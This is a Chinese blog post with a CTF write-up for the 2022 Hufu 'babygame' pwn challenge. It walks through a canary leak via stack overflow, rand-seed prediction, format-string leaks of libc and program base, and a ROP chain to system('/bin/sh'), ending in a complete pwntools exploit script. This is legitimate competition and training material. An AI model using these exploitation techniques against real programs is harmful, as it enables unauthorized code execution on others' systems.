虎符杯2022初赛_babygame

最新推荐文章于 2022-08-12 13:43:04 发布
最新推荐文章于 2022-08-12 13:43:04 发布
阅读量5.7k 收藏
点赞数 1
分类专栏: 虎符2022初赛 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyxx_wjc/article/details/123659509
版权
本文详细介绍了如何解决一个CTF挑战,该挑战涉及到栈溢出、Canary保护、格式化字符串漏洞的利用。通过分析程序流程,利用Python的ctypes库模拟C函数,最终通过ROP链技巧获取shell。文章还展示了如何泄露Canary值,计算栈布局,以及如何构造payload来绕过保护机制并控制程序执行。
摘要由CSDN通过智能技术生成

菜鸡上去打了一下,果然爆零一轮游了。

学到了不少东西,比如这个babygame(也就这题我能做了)。

checksec一下发现防护全开,Canary,PIE都开了。扔进ida里,发现程序的流程还是很好分析的:先输入名字,然后猜拳,猜拳连胜100轮后就能跑到一个函数中(显然是要覆盖随机数种子),这个函数里有一个格式化字符串漏洞,可供利用。总的来说,它像一个缝合怪......

容易看到输入名字时有一个栈溢出漏洞,但是因为这题开了canary,所以需要通过溢出漏洞泄露canary以及下面连带的last_rbp,这样我们就得到了canary的值和栈上数据的地址。

r.recvuntil('Please input your name:')
pay1=256*'a'+8*'b'
r.sendline(pay1)
r.recvuntil(8*'b')
canary=u64(r.recv(8))-0xa
last_rbp=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
vuln_ret=last_rbp-(0xd80-0xb68)      #这是通过偏移计算出vuln函数返回地址在栈上的位置,后面再讲
atoi_20=vuln_ret-0x70                #这个用于后面泄露libc基址
print('canary:',hex(canary))
print('last_rbp:',hex(last_rbp))
print('vuln_ret:',hex(vuln_ret))

在这一次溢出的过程中,我们覆盖了作为随机数种子的v5,让它变成了一个已知的定值,我们就可以在本地设置种子并执行rand,预测程序的出招并反制,从而赢得游戏。

这里可以用python的ctypes库中的CDLL,让exp能跑c的函数。

关于ctypes,可以参考大佬的博客:使用 ctypes 进行 Python 和 C 的混合编程 - Anonymous596 - 博客园 ,这里不再赘述。

libc=CDLL('/home/wjc/Desktop/libc-2.31.so')

libc.srand(0x6262626262626262)
for i in range(100):
    r.recvuntil('round')
    r.sendline(str((libc.rand()+1)%3))

然后就成功进入了格式化字符串漏洞所在的函数。先发送: 'AAAAAAAA'+0x20*".%p.",容易确定我们输入的数据前八个字符对应第六个格式字符。然后观察此时栈中的数据。

 从上图知道我们可以一次泄露出libc基址和程序加载基址,可以构造rop链了,但是vuln结束之后main也随之结束,所以我们还需让程序再次执行main,但是main函数开头地址的最后一个半字节是0x465,而返回地址的是0x543,显然是无法一步回到main的,所以我们要退而求其次,再次调用call vuln,第二次调用时我们手握ELF的基址,就能控制程序回到main了。

vuln_ret和atoi_20在上面计算过了。

r.recvuntil('Good luck to you.')
r.sendline('%62c%9$hhn'+'X%10$s'+'EFG%11$s'+p64(vuln_ret)+p64(atoi_20)+p64(vuln_ret))
r.recvuntil('X')
atoi_addr=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-20
libcbase=atoi_addr-0x445e0
r.recvuntil('EFG')
textbase=u64(r.recv(6).ljust(8,'\x00'))-0x153e
print('libcbase:',hex(libcbase))
print('textbase:',hex(textbase))

r.recvuntil('Good luck to you.')
main_addr=textbase+0x146A
low=main_addr&0xff
high=(main_addr>>8)&0xff
print('main_addr:',hex(main_addr))
print('low:',hex(low))
print('high:',hex(high))
if low>high:
    print('low!!!')
    pay2=('%'+str(high)+'c'+'%10$hhn'+'%'+str(low-high)+'c'+'%11$hhn').ljust(0x20,'G')+p64(vuln_ret+1)+p64(vuln_ret)
    r.sendline(pay2)
if high>low:
    print('high!!!')
    pay2=('%'+str(low)+'c'+'%10$hhn'+'%'+str(high-low)+'c'+'%11$hhn').ljust(0x20,'G')+p64(vuln_ret)+p64(vuln_ret+1)
    r.sendline(pay2)

这里需要注意两点。第一,在第一次vuln时,我为了防止输出泄露的数据对覆盖返回地址低位产生影响,选择先覆盖vuln的返回地址低位,所以计算程序加载基址时.应该减去的是call vuln的偏移0x153E。第二,第二次call vuln是紧接着第一次call vuln,两次vuln的buf,rbp和返回地址都是一样的,不需要再次计算。

然后成功返回了main,此时我们有了libc基址和程序加载基址,而栈溢出空间又比较充裕,我们几乎可以随心所欲构造rop链。但是到了最后还有一个小坑......

这里我们看一下main的栈帧

红框中是最初执行的main时的数据,最上面是canary,下一个是last_rbp,我们知道main是由libc_start_main函数调用的,会返回到libc_start_main中去,而libc_start_main居和last_rbp还有0x10个字节的空档! 所以我们在构造payload时,要注意多填充0x10个字节。

#0x000000000000101a : ret    
ret_addr=textbase+0x101a
#0x00000000000015d3 : pop rdi ; ret
pop_rdi_ret=textbase+0x15d3
system_addr=libcbase+0x522C0
puts_addr=libcbase+0x84450
str_bin_sh=libcbase+0x1B45BD
rop_chain=p64(ret_addr)+p64(pop_rdi_ret)+p64(str_bin_sh)+p64(system_addr)
payload=256*'A'+8*'b'+p64(canary)+0x18*'b'+rop_chain

r.recvuntil('Please input your name:')
r.sendline(payload)

libc.srand(0x6262626262626262)
r.recvuntil('round')
r.sendline(str((libc.rand()-1)%3)

这次猜拳游戏输掉就行了,输掉只是不执行vuln,程序还会进行的。

拿到shell:

很遗憾我没能在赛场上解出这道题,所以我只能打本地,不知道远程能不能打通,但我想问题应该不大。

EXP:

from pwn import *
from ctypes import cdll,CDLL

#context.log_level='debug'
r=process('/home/wjc/Desktop/babygame')
e=ELF('/home/wjc/Desktop/babygame')
libc=CDLL('/home/wjc/Desktop/libc-2.31.so')

r.recvuntil('Please input your name:')
pay1=256*'a'+8*'b'
r.sendline(pay1)
r.recvuntil(8*'b')
canary=u64(r.recv(8))-0xa
last_rbp=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
vuln_ret=last_rbp-(0xd80-0xb68)
atoi_20=vuln_ret-0x70
print('canary:',hex(canary))
print('last_rbp:',hex(last_rbp))
print('vuln_ret:',hex(vuln_ret))

libc.srand(0x6262626262626262)
for i in range(100):
    r.recvuntil('round')
    r.sendline(str((libc.rand()+1)%3))

r.recvuntil('Good luck to you.')
r.sendline('%62c%9$hhn'+'X%10$s'+'EFG%11$s'+p64(vuln_ret)+p64(atoi_20)+p64(vuln_ret))
r.recvuntil('X')
atoi_addr=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-20
libcbase=atoi_addr-0x445e0
r.recvuntil('EFG')
textbase=u64(r.recv(6).ljust(8,'\x00'))-0x153e
print('libcbase:',hex(libcbase))
print('textbase:',hex(textbase))

r.recvuntil('Good luck to you.')
main_addr=textbase+0x146A
low=main_addr&0xff
high=(main_addr>>8)&0xff
print('main_addr:',hex(main_addr))
print('low:',hex(low))
print('high:',hex(high))
if low>high:
    print('low!!!')
    pay2=('%'+str(high)+'c'+'%10$hhn'+'%'+str(low-high)+'c'+'%11$hhn').ljust(0x20,'G')+p64(vuln_ret+1)+p64(vuln_ret)
    r.sendline(pay2)
if high>low:
    print('high!!!')
    pay2=('%'+str(low)+'c'+'%10$hhn'+'%'+str(high-low)+'c'+'%11$hhn').ljust(0x20,'G')+p64(vuln_ret)+p64(vuln_ret+1)
    r.sendline(pay2)

#0x000000000000101a : ret    
ret_addr=textbase+0x101a
#0x00000000000015d3 : pop rdi ; ret
pop_rdi_ret=textbase+0x15d3
system_addr=libcbase+0x522C0
puts_addr=libcbase+0x84450
str_bin_sh=libcbase+0x1B45BD
rop_chain=p64(ret_addr)+p64(pop_rdi_ret)+p64(str_bin_sh)+p64(system_addr)
payload=256*'A'+8*'b'+p64(canary)+0x18*'b'+rop_chain

r.recvuntil('Please input your name:')
r.sendline(payload)

libc.srand(0x6262626262626262)
r.recvuntil('round')
r.sendline(str((libc.rand()-1)%3))
sleep(0.5)
r.sendline('cd ..;cd ..;cd ..;cd ..')  
#因为远程关了,我只能打本地,这个是为了方便退到根目录下拿我本地的flag的省事做法。

r.interactive()

 

 

Jmp.Cliff
关注
专栏目录
虎符-逆向-redemption_code
AlienEowynWan的博客
04-06 1130
早上洗了一早上衣服突然想起虎符的事情,匆匆开了电脑啥也没接出来,对着大佬的WP复现。 S1lenc3师傅带带我~~ 无壳,32位 MIPS的,使用ida7.5打开 ctrl+f搜索main,跳转到主函数F5反编译查看 这有个判断函数,后面v10等于7有提到flag 看看函数server_check_redemption_code() 最后写着return k - v10 + 1; 那说明v10(新)==k - v10(旧) + 1; v10(新)==7已经知道,现在需要找的是v10(旧)和k 还是看函数
[HFCTF2022]ezphp
snowlyzz的博客
10-24 2631
FastCgi 缓存文件加载恶意so
虎符CTF-2022 babygame 题解
CoLin的pwn小屋
04-01 1107
虎符CTF最简单的一道pwn题。
2022 虎符 pwn babygame
yongbaoii的博客
03-21 665
这次最简单的题目,题目也是被打烂了
2022 虎符 babygame
sky123博客
03-22 798
分析主程序: 首先执行 game 函数,返回结果大于 0 则执行 vul 函数。 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { char buf[256]; // [rsp+0h] [rbp-120h] BYREF unsigned int v5; // [rsp+100h] [rbp-20h] int suc; // [rsp+104h] [rbp-1Ch] unsigned __int64 v7; // [rsp+
虎符2022RE复现
Pvr1sC的博客
03-26 3524
复现了2道
2022数字中国创新大赛虎符网络安全赛道 初赛4道赛题 vdq-mva-fpbe-static.zip
最新发布
04-22
2022数字中国创新大赛虎符网络安全赛道 初赛4道赛题 vdq-mva-fpbe-static
新锐 _ 虎符网络王伟alert7:人总是要挑战下自己的.pdf
09-18
王伟,作为虎符网络的创始人,提出了“零信任安全”理念,为解决当前信息安全面临的问题提供了全新的思路。 首先,我们来解释一下“零信任安全”。这是一个与传统网络安全理念相对的概念,其核心原则是“永不信任,...
虎符科技网络安全通信服务三种解决方案推选PPT文档.ppt
10-27
虎符科技的网络安全通信服务主要针对当前网络环境中存在的诸多问题,如钓鱼网站、骚扰电话和垃圾邮件等,这些问题的根源在于网络身份识别的缺失和传统安全措施的滞后。虎符科技提供的解决方案是基于自主创新的标识...
2022虎符线上团队赛 有关web的部分题解(持续更新)
weixin_51458899的博客
03-23 4240
ezphp 可以参考jacko大神的虎符CTF (wolai.com) 题目是与p神之前的博客相似: 我是如何利用环境变量注入执行任意命令 | 离别歌 (leavesongs.com) 可惜题目相同环境不同,刚好此题是上面博客未解答的部分 最终通过查阅资料发现: hxp CTF 2021 - A New Novel LFI - 跳跳糖 (tttang.com) 简单而言就是 fastcgi在处理过大的临时文件时,删除文件没有关闭句柄导致/proc/PID/fd/泄露,于是制造了文件上传的点 关于动态链接库的
虎符——虚拟机逆向
寻梦&之璐
04-05 2835
文章目录查壳拖进idavm函数push[input]print vm_stack[vm_sp]eip++ 查壳 拖进ida 有一个输入参数,记得调试时加上参数。即运行时要指定参数./vm , ida调试要在debugger -> process options -> parameters写上参数code bss_data{ Dword vm_eip; Dword vm_sp; Qword code; // *(bss_data+1) Qword vm_stack; // *(
2021虎符ctf和红明谷re部分wp
lucky_boyQAQ的博客
04-09 620
2021虎符ctf和红明谷re部分wp 2021虎符ctf和红明谷re部分wp
2021[HFCTF]虎符网络安全赛道re部分wp
n1ptune__的博客
04-07 1358
CrackMe 这题是使用c++写的,因为无符号表,ida对c++的解析不是很友好,可以去了解一下c++的string类型的结构,对解题很有帮助,推荐看这篇文章链接: https://bbs.pediy.com/thread-230312.htm. 程序先将长度为17位的输入分为7位和10位两部分 再输入一个数要求满足一定条件 直接爆破 #include <stdio.h> #include <stdlib.h> #include <math.h> double f
虎符-ctf crypto writeup
zhang14916的博客
04-23 1853
1.GM 由于题目中描述了这时一个GM密码系统,所以我们在网上查到FM密码系统破解方式https://blog.csdn.net/qq_26816591/article/details/82957481 首先根据n,phin建立一元二次方程求解n的因子p,q,再带入到解密公式中求解 import gmpy2 phi=943345166174941322591941459524332131...
2021虎符web(部分)
羽的博客
04-04 2302
签到 根据提示直接在网上搜新闻。 这个后门代码很简单,它被加到zlib扩展里,当发现请求User-Agentt中包含字符串zerodium时,则用eval执行User-Agent第8位字符后内容。黑客大概是希望传入并执行zerodiumphpinfo();这样的内容。 也就是说zerodiumsystem将会有system函数的功能。 payload: unsetme 在网站上下载下来源码,修改index.php后本地搭建。 开启报错后爆出关键内容 找到代码位置 其中$key为我们传入的a的内容
记录虎符线下决赛flask反序列化及patch思路
莫慌的博客
08-12 434
转载比较好的文章,提升对代码审计和反序列化渗透的思路
函数指针
du1232的博客
11-17 145
函数指针 指向函数的指针,存放函数的地址。 #include"stdio.h" int Add(int x, int y); { return x + y; } int main() { int arr[10] = { 1, 2, 3, 4, 5, 6, 7, 8 }; int(*p)[10] = &arr;//取出数组的地址,p就是数组指针 int(*pf)(int, int) = &Add; printf("%p\n",&Add); printf("%p\n", A
虎符CTF2022 handle - MISC
weixin_45760568的博客
03-23 4421
虎符CTF2022 | MISC | handle (2022数字中国创新大赛虎符网络安全赛道) Part of 【COMPASS CTF】 WriteUp by Frankss@COMPASS handle (二血 909pt) 思路 (隔壁某show平台上周刚做过某套神类似的题,于是很快就把字典搞出来了,但是交互写了很久丢掉了一血) 思路就是找一个有优势的固定词开头,然后根据返回结果分枝(枝),根据不同枝选择不同的尝试(剪枝),这样接下来要处理的重复量就少很多,重复这个过程两次,几乎每一个可能的词都
虎符CTF--MISC--奇怪的组织
a965527596的博客
04-21 2369
奇怪的组织 1.拿到文件发现是c盘文件,然后发现用phpstudy建了一个dede的站,发现了3个博客和一段密文,但是没有解密的信息。 先试试了base64,结果不对,然后猜测是AES加密,解密需要key,继续从文件中找。 2.官方提示看浏览行为和聊天信息,于是利用places.sqlite文件还原火狐的历史记录,发现bob先是建了dede的站,然后访问了一个emoji的解密网站。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值